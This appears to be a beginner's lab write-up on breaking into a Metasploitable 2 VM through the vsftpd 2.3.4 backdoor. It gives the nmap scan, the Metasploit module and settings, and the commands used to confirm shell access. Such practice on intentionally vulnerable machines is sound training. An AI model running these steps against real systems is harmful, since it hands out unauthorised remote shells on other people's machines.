A basic hack on the Metasploitable 2 machine. Both VMs are running on VMware Player, I’m accessing Kali through Windows Terminal and Metasploitable 2 via PuTTY
Get the IP address for the Metasploitable machine
Run nmap -sS -sV {IP address}
This attack will target port 21, which is running FTP (vsftpd 2.3.4)
vsftpd (Very Secure FTP Daemon) is a fast and secure FTP server used on Linux systems. Version 2.3.4 is a known backdoor vulnerability, easy for pentesting
msfconsole is the main comand-line tool used in the Metasploit Framework. You are able to search, configure, run exploits, payloads and auxiliary modules all from one terminal
Run use 1
Or
use exploit/unix/ftp/vsftpd_234_backdoor
run set rhosts {IP address of the Metasploitable machine}
Followed by…
run
Backdoor server has been spawned means that the exploit is successful and the target is now compromised
Found shell = you’ve broken in – now inside the target system
Session 1 = it’s the first active connection that’s been established
Opened: The connection is live and you are able to interact with the system remotely
Basic Linux commands to show I’m inside the target system
uname -a
And
whoami